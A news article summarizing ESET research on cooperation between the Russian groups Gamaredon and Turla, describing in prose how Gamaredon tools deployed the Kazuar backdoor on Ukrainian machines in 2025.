Cybersecurity researchers have identified what they describe as a convergence between two Russian hacking groups, Gamaredon and Turla, in campaigns aimed at Ukrainian entities. The effort, researchers say, signals active cooperation between the groups to access targeted machines and deploy the Kazuar backdoor. ESET researchers attributed the collaboration to the evolving threat landscape surrounding the conflict in Ukraine.
The evidence, uncovered by ESET, shows Gamaredon’s toolset including PteroGraphin and PteroOdd being used to initiate Turla’s Kazuar backdoor on an endpoint in Ukraine in February 2025. The researchers characterize this as a clear indication that Turla is leveraging Gamaredon access to reach specific machines and deliver Kazuar.
“PteroGraphin was used to restart the Kazuar v3 backdoor, possibly after it crashed or was not launched automatically,” ESET said in a report. “Thus, PteroGraphin was probably used as a recovery method by Turla.”
In separate incidents in April and June 2025, ESET said it detected the deployment of Kazuar v2 through two additional Gamaredon families tracked as PteroOdd and PteroPaste, underscoring a broader toolkit being used to stage the intrusion.
Gamaredon (also known as Aqua Blizzard and Armageddon) and Turla (aka Secret Blizzard and Venomous Bear) have long been linked to Russia’s security apparatus, with investigators noting their focus on Ukrainian targets in recent months. ESET cautioned that Russia’s 2022 invasion of Ukraine likely accelerated this convergence, as the attackers shifted to high‑value defense-sector targets within Ukraine.
Kazuar, Turla’s staple implant, has been evolving for years. It has historically leveraged Amadey bots to deploy a backdoor called Tavdig, which then drops a .NET‑based payload. Early Kazuar activity has been observed as far back as 2016, according to Kaspersky’s SecureList. The latest Kazuar variants – v2 and v3 – are described by researchers as sharing the same codebase, with Kazuar v3 containing roughly 35% more C# lines and introducing new transport methods over WebSocket and Exchange Web Services.
The attack chain described by ESET shows Gamaredon deploying PteroGraphin to fetch a PowerShell downloader, which then retrieves a payload from the Telegraph channel to execute Kazuar. The payload also collects victim computer name and the system drive’s volume serial number, which are exfiltrated to a Cloudflare Workers sub-domain before Kazuar is launched. In February 2025, investigators observed that Kazuar was already present on the system, suggesting timelines consistent with the campaign described by ESET.
In another development, ESET said it identified a separate Kazuar v2 sample in March 2025, and later a June 2025 branch where Kazuar v2 was dropped from PteroPaste via a PowerShell downloader named ekrn.ps1 onto two Ukrainian machines. The use of the name ekrn appears to be an attempt to masquerade as the legitimate binary associated with ESET’s products. Analysts said the developments point to a coordinated effort by the two groups to gain footholds and expand Kazuar deployment.
“We now believe with high confidence that both groups – separately associated with the FSB – are cooperating and that Gamaredon is providing initial access to Turla,” said ESET researchers Matthieu Faou and Zoltán Rusnák.